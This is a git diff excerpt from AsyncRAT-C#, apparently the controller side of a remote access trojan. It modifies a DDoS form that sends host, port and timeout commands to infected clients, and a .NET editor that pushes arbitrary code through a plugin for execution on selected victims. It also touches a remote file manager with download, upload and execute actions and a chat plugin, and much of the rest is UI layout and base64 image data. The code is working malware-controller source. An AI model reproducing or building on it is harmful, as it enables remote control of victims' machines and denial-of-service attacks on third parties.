+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Chat.dll"));
+ ThreadPool.QueueUserWorkItem(ParentClient.Send, msgpack.Encode2Bytes());
}
}
private void FormChat_FormClosed(object sender, FormClosedEventArgs e)
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "chatExit";
- ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ if (Client != null)
+ {
+ try
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "chatExit";
+ ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ }
+ catch { }
+ }
}
private void Timer1_Tick(object sender, EventArgs e)
{
try
{
- if (!Client.TcpClient.Connected) this.Close();
+ if (!ParentClient.TcpClient.Connected || !Client.TcpClient.Connected) this.Close();
}
catch { }
}
diff --git a/AsyncRAT-C#/Server/Forms/FormDOS.Designer.cs b/AsyncRAT-C#/Server/Forms/FormDOS.Designer.cs
index a369eca..411d850 100644
--- a/AsyncRAT-C#/Server/Forms/FormDOS.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormDOS.Designer.cs
@@ -36,8 +36,6 @@
this.txtPort = new System.Windows.Forms.TextBox();
this.txtHost = new System.Windows.Forms.TextBox();
this.groupBox2 = new System.Windows.Forms.GroupBox();
- this.btnAll = new System.Windows.Forms.RadioButton();
- this.btnSelected = new System.Windows.Forms.RadioButton();
this.label4 = new System.Windows.Forms.Label();
this.label3 = new System.Windows.Forms.Label();
this.txtTimeout = new System.Windows.Forms.TextBox();
@@ -100,8 +98,6 @@
//
// groupBox2
//
- this.groupBox2.Controls.Add(this.btnAll);
- this.groupBox2.Controls.Add(this.btnSelected);
this.groupBox2.Controls.Add(this.label4);
this.groupBox2.Controls.Add(this.label3);
this.groupBox2.Controls.Add(this.txtTimeout);
@@ -112,28 +108,6 @@
this.groupBox2.TabStop = false;
this.groupBox2.Text = "Settings";
//
- // btnAll
- //
- this.btnAll.AutoSize = true;
- this.btnAll.Checked = true;
- this.btnAll.Location = new System.Drawing.Point(455, 43);
- this.btnAll.Name = "btnAll";
- this.btnAll.Size = new System.Drawing.Size(103, 24);
- this.btnAll.TabIndex = 7;
- this.btnAll.TabStop = true;
- this.btnAll.Text = "All Clients";
- this.btnAll.UseVisualStyleBackColor = true;
- //
- // btnSelected
- //
- this.btnSelected.AutoSize = true;
- this.btnSelected.Location = new System.Drawing.Point(273, 43);
- this.btnSelected.Name = "btnSelected";
- this.btnSelected.Size = new System.Drawing.Size(149, 24);
- this.btnSelected.TabIndex = 6;
- this.btnSelected.Text = "Selected Clients";
- this.btnSelected.UseVisualStyleBackColor = true;
- //
// label4
//
this.label4.AutoSize = true;
@@ -235,8 +209,6 @@
private System.Windows.Forms.Label label4;
private System.Windows.Forms.Label label3;
private System.Windows.Forms.TextBox txtTimeout;
- private System.Windows.Forms.RadioButton btnAll;
- private System.Windows.Forms.RadioButton btnSelected;
private System.Windows.Forms.GroupBox groupBox3;
private System.Windows.Forms.Button btnStop;
private System.Windows.Forms.Button btnAttack;
diff --git a/AsyncRAT-C#/Server/Forms/FormDOS.cs b/AsyncRAT-C#/Server/Forms/FormDOS.cs
index f996ee4..196df77 100644
--- a/AsyncRAT-C#/Server/Forms/FormDOS.cs
+++ b/AsyncRAT-C#/Server/Forms/FormDOS.cs
@@ -12,6 +12,7 @@ using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
+using System.IO;
namespace Server.Forms
{
@@ -20,7 +21,9 @@ namespace Server.Forms
private TimeSpan timespan;
private Stopwatch stopwatch;
private string status = "is online";
- private List selectedClients = new List();
+ public object sync = new object();
+ public List selectedClients = new List();
+ public List PlguinClients = new List();
public FormDOS()
{
InitializeComponent();
@@ -37,74 +40,55 @@ namespace Server.Forms
}
catch { return; }
- if (Program.form1.listView1.Items.Count > 0)
+ if (PlguinClients.Count > 0)
{
- btnAttack.Enabled = false;
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "dos";
- msgpack.ForcePathObject("Option").AsString = "postStart";
- msgpack.ForcePathObject("Host").AsString = txtHost.Text;
- msgpack.ForcePathObject("Port").AsString = txtPort.Text;
- msgpack.ForcePathObject("Timeout").AsString = txtTimeout.Text;
- if (btnAll.Checked)
+ try
{
- foreach (ListViewItem itm in Program.form1.listView1.Items)
+ btnAttack.Enabled = false;
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "dos";
+ msgpack.ForcePathObject("Option").AsString = "postStart";
+ msgpack.ForcePathObject("Host").AsString = txtHost.Text;
+ msgpack.ForcePathObject("Port").AsString = txtPort.Text;
+ msgpack.ForcePathObject("Timeout").AsString = txtTimeout.Text;
+
+ foreach (Clients clients in PlguinClients)
{
- Clients client = (Clients)itm.Tag;
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ selectedClients.Add(clients);
+ ThreadPool.QueueUserWorkItem(clients.Send, msgpack.Encode2Bytes());
}
+
+ btnStop.Enabled = true;
+ timespan = TimeSpan.FromSeconds(Convert.ToInt32(txtTimeout.Text) * 60);
+ stopwatch = new Stopwatch();
+ stopwatch.Start();
+ timer1.Start();
+ timer2.Start();
}
- else
- {
- foreach (ListViewItem itm in Program.form1.listView1.SelectedItems)
- {
- Clients client = (Clients)itm.Tag;
- selectedClients.Add(client);
- client.LV.ForeColor = Color.Green;
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
- }
- }
- btnStop.Enabled = true;
- btnAll.Enabled = false;
- btnSelected.Enabled = false;
- timespan = TimeSpan.FromSeconds(Convert.ToInt32(txtTimeout.Text) * 60);
- stopwatch = new Stopwatch();
- stopwatch.Start();
- timer1.Start();
- timer2.Start();
+ catch { }
}
}
private void BtnStop_Click(object sender, EventArgs e)
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "dos";
- msgpack.ForcePathObject("Option").AsString = "postStop";
- if (btnAll.Checked)
+ try
{
- foreach (ListViewItem itm in Program.form1.listView1.Items)
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "dos";
+ msgpack.ForcePathObject("Option").AsString = "postStop";
+
+ foreach (Clients clients in PlguinClients)
{
- Clients client = (Clients)itm.Tag;
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
- }
- }
- else
- {
- foreach (Clients client in selectedClients.ToList())
- {
- client.LV.ForeColor = Color.Empty;
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ ThreadPool.QueueUserWorkItem(clients.Send, msgpack.Encode2Bytes());
}
selectedClients.Clear();
- selectedClients = new List();
+ btnAttack.Enabled = true;
+ btnStop.Enabled = false;
+ timer1.Stop();
+ timer2.Stop();
+ status = "is online";
}
- btnAttack.Enabled = true;
- btnStop.Enabled = false;
- btnAll.Enabled = true;
- btnSelected.Enabled = true;
- timer1.Stop();
- timer2.Stop();
- status = "is online";
+ catch { }
}
private void Timer1_Tick(object sender, EventArgs e)
@@ -114,8 +98,6 @@ namespace Server.Forms
{
btnAttack.Enabled = true;
btnStop.Enabled = false;
- btnAll.Enabled = true;
- btnSelected.Enabled = true;
timer1.Stop();
timer2.Stop();
status = "is online";
@@ -139,6 +121,16 @@ namespace Server.Forms
private void FormDOS_FormClosing(object sender, FormClosingEventArgs e)
{
+ try
+ {
+ foreach (Clients clients in PlguinClients)
+ {
+ clients.Disconnected();
+ }
+ PlguinClients.Clear();
+ selectedClients.Clear();
+ }
+ catch { }
this.Hide();
this.Parent = null;
e.Cancel = true;
diff --git a/AsyncRAT-C#/Server/Forms/FormDotNetEditor.cs b/AsyncRAT-C#/Server/Forms/FormDotNetEditor.cs
index 2e08d41..738fa8d 100644
--- a/AsyncRAT-C#/Server/Forms/FormDotNetEditor.cs
+++ b/AsyncRAT-C#/Server/Forms/FormDotNetEditor.cs
@@ -15,6 +15,7 @@ using Server.Connection;
using FastColoredTextBoxNS;
using Microsoft.CSharp;
using Microsoft.VisualBasic;
+using Server.Algorithm;
namespace Server.Forms
{
@@ -46,11 +47,17 @@ namespace Server.Forms
{
reference.Add(ip);
}
+
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "executeDotNetCode";
+ packet.ForcePathObject("Option").AsString = comboLang.Text;
+ packet.ForcePathObject("Code").AsString = txtBox.Text;
+ packet.ForcePathObject("Reference").AsString = string.Join(",", reference);
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "executeDotNetCode";
- msgpack.ForcePathObject("Option").AsString = comboLang.Text;
- msgpack.ForcePathObject("Code").AsString = txtBox.Text;
- msgpack.ForcePathObject("Reference").AsString = string.Join(",", reference);
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
foreach (ListViewItem item in Program.form1.listView1.SelectedItems)
{
diff --git a/AsyncRAT-C#/Server/Forms/FormFileManager.Designer.cs b/AsyncRAT-C#/Server/Forms/FormFileManager.Designer.cs
index 37d2b7a..5b93886 100644
--- a/AsyncRAT-C#/Server/Forms/FormFileManager.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormFileManager.Designer.cs
@@ -52,14 +52,14 @@
this.dELETEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator4 = new System.Windows.Forms.ToolStripSeparator();
this.createFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
+ this.openClientFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.imageList1 = new System.Windows.Forms.ImageList(this.components);
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel3 = new System.Windows.Forms.ToolStripStatusLabel();
this.timer1 = new System.Windows.Forms.Timer(this.components);
- this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
- this.openClientFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.SuspendLayout();
@@ -75,6 +75,7 @@
this.columnHeader1,
this.columnHeader2});
this.listView1.ContextMenuStrip = this.contextMenuStrip1;
+ this.listView1.HideSelection = false;
this.listView1.LargeImageList = this.imageList1;
this.listView1.Location = new System.Drawing.Point(0, 1);
this.listView1.Name = "listView1";
@@ -106,19 +107,19 @@
this.toolStripSeparator3,
this.openClientFolderToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
- this.contextMenuStrip1.Size = new System.Drawing.Size(241, 439);
+ this.contextMenuStrip1.Size = new System.Drawing.Size(233, 406);
//
// backToolStripMenuItem
//
this.backToolStripMenuItem.Name = "backToolStripMenuItem";
- this.backToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.backToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.backToolStripMenuItem.Text = "Back";
this.backToolStripMenuItem.Click += new System.EventHandler(this.backToolStripMenuItem_Click);
//
// rEFRESHToolStripMenuItem
//
this.rEFRESHToolStripMenuItem.Name = "rEFRESHToolStripMenuItem";
- this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.rEFRESHToolStripMenuItem.Text = "Refresh";
this.rEFRESHToolStripMenuItem.Click += new System.EventHandler(this.rEFRESHToolStripMenuItem_Click);
//
@@ -131,7 +132,7 @@
this.toolStripSeparator2,
this.driversListsToolStripMenuItem});
this.gOTOToolStripMenuItem.Name = "gOTOToolStripMenuItem";
- this.gOTOToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.gOTOToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.gOTOToolStripMenuItem.Text = "Go To";
//
// dESKTOPToolStripMenuItem
@@ -170,69 +171,81 @@
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
- this.toolStripSeparator1.Size = new System.Drawing.Size(237, 6);
+ this.toolStripSeparator1.Size = new System.Drawing.Size(229, 6);
//
// downloadToolStripMenuItem
//
this.downloadToolStripMenuItem.Name = "downloadToolStripMenuItem";
- this.downloadToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.downloadToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.downloadToolStripMenuItem.Text = "Download";
this.downloadToolStripMenuItem.Click += new System.EventHandler(this.downloadToolStripMenuItem_Click);
//
// uPLOADToolStripMenuItem
//
this.uPLOADToolStripMenuItem.Name = "uPLOADToolStripMenuItem";
- this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.uPLOADToolStripMenuItem.Text = "Upload";
this.uPLOADToolStripMenuItem.Click += new System.EventHandler(this.uPLOADToolStripMenuItem_Click);
//
// eXECUTEToolStripMenuItem
//
this.eXECUTEToolStripMenuItem.Name = "eXECUTEToolStripMenuItem";
- this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.eXECUTEToolStripMenuItem.Text = "Execute";
this.eXECUTEToolStripMenuItem.Click += new System.EventHandler(this.eXECUTEToolStripMenuItem_Click);
//
// renameToolStripMenuItem
//
this.renameToolStripMenuItem.Name = "renameToolStripMenuItem";
- this.renameToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.renameToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.renameToolStripMenuItem.Text = "Rename";
this.renameToolStripMenuItem.Click += new System.EventHandler(this.RenameToolStripMenuItem_Click);
//
// copyToolStripMenuItem
//
this.copyToolStripMenuItem.Name = "copyToolStripMenuItem";
- this.copyToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.copyToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.copyToolStripMenuItem.Text = "Copy";
this.copyToolStripMenuItem.Click += new System.EventHandler(this.CopyToolStripMenuItem_Click);
//
// pasteToolStripMenuItem
//
this.pasteToolStripMenuItem.Name = "pasteToolStripMenuItem";
- this.pasteToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.pasteToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.pasteToolStripMenuItem.Text = "Paste";
this.pasteToolStripMenuItem.Click += new System.EventHandler(this.PasteToolStripMenuItem_Click_1);
//
// dELETEToolStripMenuItem
//
this.dELETEToolStripMenuItem.Name = "dELETEToolStripMenuItem";
- this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.dELETEToolStripMenuItem.Text = "Delete";
this.dELETEToolStripMenuItem.Click += new System.EventHandler(this.dELETEToolStripMenuItem_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
- this.toolStripSeparator4.Size = new System.Drawing.Size(237, 6);
+ this.toolStripSeparator4.Size = new System.Drawing.Size(229, 6);
//
// createFolderToolStripMenuItem
//
this.createFolderToolStripMenuItem.Name = "createFolderToolStripMenuItem";
- this.createFolderToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
+ this.createFolderToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
this.createFolderToolStripMenuItem.Text = "Create Folder";
this.createFolderToolStripMenuItem.Click += new System.EventHandler(this.CreateFolderToolStripMenuItem_Click);
//
+ // toolStripSeparator3
+ //
+ this.toolStripSeparator3.Name = "toolStripSeparator3";
+ this.toolStripSeparator3.Size = new System.Drawing.Size(229, 6);
+ //
+ // openClientFolderToolStripMenuItem
+ //
+ this.openClientFolderToolStripMenuItem.Name = "openClientFolderToolStripMenuItem";
+ this.openClientFolderToolStripMenuItem.Size = new System.Drawing.Size(232, 32);
+ this.openClientFolderToolStripMenuItem.Text = "Open Client Folder";
+ this.openClientFolderToolStripMenuItem.Click += new System.EventHandler(this.OpenClientFolderToolStripMenuItem_Click);
+ //
// imageList1
//
this.imageList1.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageList1.ImageStream")));
@@ -276,22 +289,9 @@
//
// timer1
//
- this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
- // toolStripSeparator3
- //
- this.toolStripSeparator3.Name = "toolStripSeparator3";
- this.toolStripSeparator3.Size = new System.Drawing.Size(237, 6);
- //
- // openClientFolderToolStripMenuItem
- //
- this.openClientFolderToolStripMenuItem.Name = "openClientFolderToolStripMenuItem";
- this.openClientFolderToolStripMenuItem.Size = new System.Drawing.Size(240, 32);
- this.openClientFolderToolStripMenuItem.Text = "Open Client Folder";
- this.openClientFolderToolStripMenuItem.Click += new System.EventHandler(this.OpenClientFolderToolStripMenuItem_Click);
- //
// FormFileManager
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
@@ -302,6 +302,7 @@
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormFileManager";
this.Text = "FileManager";
+ this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormFileManager_FormClosed);
this.contextMenuStrip1.ResumeLayout(false);
this.statusStrip1.ResumeLayout(false);
this.statusStrip1.PerformLayout();
@@ -326,7 +327,6 @@
private System.Windows.Forms.ToolStripMenuItem dELETEToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem rEFRESHToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem eXECUTEToolStripMenuItem;
- private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.ToolStripMenuItem gOTOToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem dESKTOPToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem aPPDATAToolStripMenuItem;
@@ -341,5 +341,6 @@
private System.Windows.Forms.ToolStripMenuItem driversListsToolStripMenuItem;
private System.Windows.Forms.ToolStripSeparator toolStripSeparator3;
private System.Windows.Forms.ToolStripMenuItem openClientFolderToolStripMenuItem;
+ public System.Windows.Forms.Timer timer1;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormFileManager.cs b/AsyncRAT-C#/Server/Forms/FormFileManager.cs
index 0c6f2e5..5e584aa 100644
--- a/AsyncRAT-C#/Server/Forms/FormFileManager.cs
+++ b/AsyncRAT-C#/Server/Forms/FormFileManager.cs
@@ -394,5 +394,10 @@ namespace Server.Forms
}
catch { }
}
+
+ private void FormFileManager_FormClosed(object sender, FormClosedEventArgs e)
+ {
+ Client?.Disconnected();
+ }
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormFileManager.resx b/AsyncRAT-C#/Server/Forms/FormFileManager.resx
index 88e86df..40a6e89 100644
--- a/AsyncRAT-C#/Server/Forms/FormFileManager.resx
+++ b/AsyncRAT-C#/Server/Forms/FormFileManager.resx
@@ -127,8 +127,8 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
- ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABk
- ZQAAAk1TRnQBSQFMAgEBAwEAAUgBAAFIAQABMAEAATABAAT/ASEBAAj/AUIBTQE2BwABNgMAASgDAAHA
+ ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABS
+ ZQAAAk1TRnQBSQFMAgEBAwEAAVgBAAFYAQABMAEAATABAAT/ASEBAAj/AUIBTQE2BwABNgMAASgDAAHA
AwABMAMAAQEBAAEgBgABkEYAAwEBAgMMARADJwE7AxkBIwMFAQdDAAEBQwAEAQECAwEBAgMBAQIDAQEC
AwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQEC
AwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQEC
@@ -136,431 +136,431 @@
AwABASsAAQEDBAEFAwsBDwMUARwDFQEdAwcBCgMCAQMDAQECAwABASwAAwIBAwMIAQsDDwEUAxIBGAMS
ARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMS
ARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEgEYAxIBGAMS
- ARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEQEXAw0BEgMHAQkDAgED/wC5AAM7AWMBXgJhAd0BUgG0
- AdEB/wNCAXUDFgEfAwUBBwMBAQInAAEBAwMBBAMYASEDNgFYAU8CUwGlAVACUgGkAyIBMgMKAQ0DBwEJ
- AwMBBCgAAwEBAgMLAQ8DHwEtAy4BSAMzAVIDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMz
- AVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMz
- AVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzIBUQMs
- AUQDGwEmAwgBCwMAAQH/AKkAAwQBBQMcASgDRQF8A14B1QFUAXsBkAH6AVMBtQHSAf8DRgF/AyIBMQMT
- ARoDCwEPAwUBBwMBAQIDAAEBAwMBBAMHAQoDEgEYAxsBJgMkATYDOAFdA0sBjgNYAbwBWgJdAdMBXQFh
- AWMB4gFdAWgBagHwA14B3QNHAYIDMQFPAyABLwMSARgDBgEIAwIBAwMAAQEcAAMEAQUDFwEgA0gBhQNQ
- AaMDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNU
+ ARgDEgEYAxIBGAMSARgDEgEYAxIBGAMSARgDEQEXAw0BEgMHAQkDAgED/wC5AAM7AWMDXgHdAVABtAHR
+ Af8DQgF1AxYBHwMFAQcDAQECJwABAQMDAQQDGAEhAzYBWAFPAlMBpQFQAlIBpAMiATIDCgENAwcBCQMD
+ AQQoAAMBAQIDCwEPAx8BLQMuAUgDMwFSAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFT
+ AzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFT
+ AzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMzAVMDMwFTAzMBUwMyAVEDLAFE
+ AxsBJgMIAQsDAAEB/wCpAAMEAQUDHAEoA0UBfANeAdUBUgF5AYoB+gFRAbUB0gH/A0YBfwMiATEDEwEa
+ AwsBDwMFAQcDAQECAwABAQMDAQQDBwEKAxIBGAMbASYDJAE2AzgBXQNLAY4DWAG8AVoCXQHTAV0CYQHi
+ AV0BZgFoAfADXgHdA0cBggMxAU8DIAEvAxIBGAMGAQgDAgEDAwABARwAAwQBBQMXASADSAGFA1ABowNU
AasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNU
- AasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNTAaoDUAGfAzgBXAMSARkDAgED/wCkAAEB
- AwIBAwMiATIDTQGRAV8BZgFpAegBXQGSAZkB+wFUAbIB0AH/AVMBtgHTAf8DSAGDAycBOwMeASsDGQEj
- AxQBHAMTBBoEJAE2AzQBVANJAYgDVgG0AVoCXQHTAV8BZAFmAeABXQFxAXcB7QFdAYoBkAH5AVABpAG1
- Af0BUwGwAc4B/wFRAbQB0gH/AVABjQGgAfoBYgFmAWsB5wFeAmEB2gNCAXQDIwEzAxIBGAMHAQoDAgED
- HAADBQEHAx0BKgNBAfkDSwH/A0sB/wNLAf8DSwH/A0sB/wMDAf8DAwH/AwMB/wMEAf8DDAH/AywB/wNL
- Af8DSwH/A0sB/wNLAf8DSwH/AykB/wNKAf8DSgH/A0oB/wNKAf8DSgH/A0oB/wNLAf8DSwH/A0sB/wNL
- Af8DSwH/A0sB/wNLAf8DSwH/A0sB/wNLAf8DSwH/A0sB/wNLAf8DaQH/A1MB/wNLAf8DSwH/A0sB/wNZ
- AdcDFwEgAwQBBQsAAQEDAgQDBAQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQME
+ AasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1QBqwNU
+ AasDVAGrA1QBqwNUAasDVAGrA1QBqwNUAasDVAGrA1MBqgNQAZ8DOAFcAxIBGQMCAQP/AKQAAQEDAgED
+ AyIBMgNNAZEBXwFkAWcB6AFdAZABlgH7AVIBsgHQAf8BUQG2AdMB/wNIAYMDJwE7Ax4BKwMZASMDFAEc
+ AxMEGgQkATYDNAFUA0kBiANWAbQBWgJdAdMBXwFiAWQB4AFdAWsBcQHtAV0BiAGNAfkBTgGkAbMB/QFR
+ AbABzgH/AU8BtAHSAf8BTgGHAZwB+gFiAWQBZgHnAV4CYQHaA0IBdAMjATMDEgEYAwcBCgMCAQMcAAMF
+ AQcDHQEqA0EB+QNJAf8DSQH/A0kB/wNJAf8DSQH/AwEB/wMBAf8DAQH/AwIB/wMKAf8DKgH/A0kB/wNJ
+ Af8DSQH/A0kB/wNJAf8DJwH/A0gB/wNIAf8DSAH/A0gB/wNIAf8DSAH/A0kB/wNJAf8DSQH/A0kB/wNJ
+ Af8DSQH/A0kB/wNJAf8DSQH/A0kB/wNJAf8DSQH/A0kB/wNnAf8DUQH/A0kB/wNJAf8DSQH/A1kB1wMX
+ ASADBAEFCwABAQMCBAMEBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQME
AQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQME
- AQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwIBAwMA
- AQHoAAMCAQMDDQERA1UBrQFZAX4BhQH1AVMBtwHVAf8BUwG3AdUB/wFTAbcB1QH/AVQBtwHUAf8DSAGE
- AykBPwMjATMDKAE8AzQBVANIAYQDWAHGAWIBYwFkAe8BUQG1AdMB/wFRAbUB0wH/AVEBtQHTAf8BUQG1
- AdMB/wFRAbUB0wH/AVEBtQHTAf8BUQG1AdMB/wFRAbUB0wH/AVEBtQHTAf8BUgG1AdMB/wFSAbUB0wH/
- AVMBtQHTAf8BVAG2AdMB/wNOAZgDLQFGAx8BLAMRARcDBgEIHAADBQEHAx8BLAM/Af4DUQH/A1EB/wNR
- Af8DUQH/A1EB/wMAAf8DBQH/A0EB/wNRAf8DUQH/A1EB/wNRAf8DUQH/A1EB/wNRAf8DUQH/AyoB/wNi
- Af8DYgH/A2IB/wNiAf8DYgH/A2IB/wNRAf8DUQH/A1EB/wNRAf8DUQH/A1EB/wNRAf8DUQH/A1EB/wNR
- Af8DUQH/A1EB/wNDAf8BAAG/ASwB/wE0AWABNAH/A1EB/wNRAf8DUQH/AzYB/wMYASIDBAEFBAADAgED
- AwkBDAMaASUDKgFBAywBRAMsAUQDLAFEAywBRAMsAUQDLAFEAywBRAMsAUQDLAFEAywBRAMsAUQDLAFE
+ AQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDBAEFAwQBBQMEAQUDAgEDAwABAegA
+ AwIBAwMNAREDVQGtAVkBdwGBAfUBUQG3AdUB/wFRAbcB1QH/AVEBtwHVAf8BUgG3AdQB/wNIAYQDKQE/
+ AyMBMwMoATwDNAFUA0gBhANYAcYDYgHvAU8BtQHTAf8BTwG1AdMB/wFPAbUB0wH/AU8BtQHTAf8BTwG1
+ AdMB/wFPAbUB0wH/AU8BtQHTAf8BTwG1AdMB/wFPAbUB0wH/AVABtQHTAf8BUAG1AdMB/wFRAbUB0wH/
+ AVIBtgHTAf8DTgGYAy0BRgMfASwDEQEXAwYBCBwAAwUBBwMfASwDPwH+A08B/wNPAf8DTwH/A08B/wNP
+ Af8DAAH/AwMB/wM/Af8DTwH/A08B/wNPAf8DTwH/A08B/wNPAf8DTwH/A08B/wMoAf8DYAH/A2AB/wNg
+ Af8DYAH/A2AB/wNgAf8DTwH/A08B/wNPAf8DTwH/A08B/wNPAf8DTwH/A08B/wNPAf8DTwH/A08B/wNP
